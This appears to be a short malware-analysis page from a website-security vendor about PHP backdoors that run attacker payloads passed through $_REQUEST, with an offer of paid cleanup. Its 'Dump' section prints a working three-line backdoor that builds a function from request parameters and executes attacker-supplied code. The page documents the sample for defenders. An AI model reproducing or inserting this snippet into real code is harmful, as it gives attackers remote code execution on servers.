Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files can be as simple as a single line of code, allowing the execution of remote code, or complex algorithms, providing different functions to the attacker.
$_REQUEST is an php array in which the content of $_GET, $_POST and $_COOKIE variables is held. The content of these variables could be anything and the attacker can fill them e.g. with the payload which is then processed. Sometimes, whole payload code is stored there and only very simple code snippet is injected to legitimate files. Such snippet only loads and executes the content of these variables.
Cleanup
You can sign up with us and let our team remove the malware for you.
Dump
Part of the code responsible for loading and evaluating the payload directly from the $_REQUEST array. The code is evaluated as a custom fuinction:
if (isset($_REQUEST['FILE'])){
$_FILE = $_REQUEST['9dcec1658eeab0566be37fcf58028701']('$_',$_REQUEST['FILE'].'($_);');
$_FILE(stripslashes($_REQUEST['HOST']));}